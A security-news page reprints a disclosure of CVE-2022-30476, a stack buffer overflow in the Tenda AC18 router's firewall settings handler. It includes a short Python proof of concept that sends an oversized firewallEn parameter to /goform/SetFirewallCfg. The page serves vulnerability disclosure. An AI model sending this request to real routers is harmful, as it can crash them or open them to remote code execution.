Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30476: VulnRepo/IoT/Tenda/6 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetFirewallCfg request.

CVE
#vulnerability#rce#buffer_overflow

Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/SetFirewallCfg page which influences the lastest version of Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318))

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function formSetFirewallCfg.

In function formSetFirewallCfg it reads user provided parameter firewallEn into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer dest.

So by requesting the page /goform/SetFirewallCfg, the attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

PoC

import requests

IP = “10.10.10.1” url = f"http://{IP}/goform/SetFirewallCfg?" url += “firewallEn=” + “s” * 0x500

response = requests.get(url)

Timeline

  • 2022-05-07: Report to CVE & CNVD;
  • 2022-05-26: CVE ID assigned (CVE-2022-30476)

Acknowledge

Credit to @peanuts and @cylin from IIE, CAS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907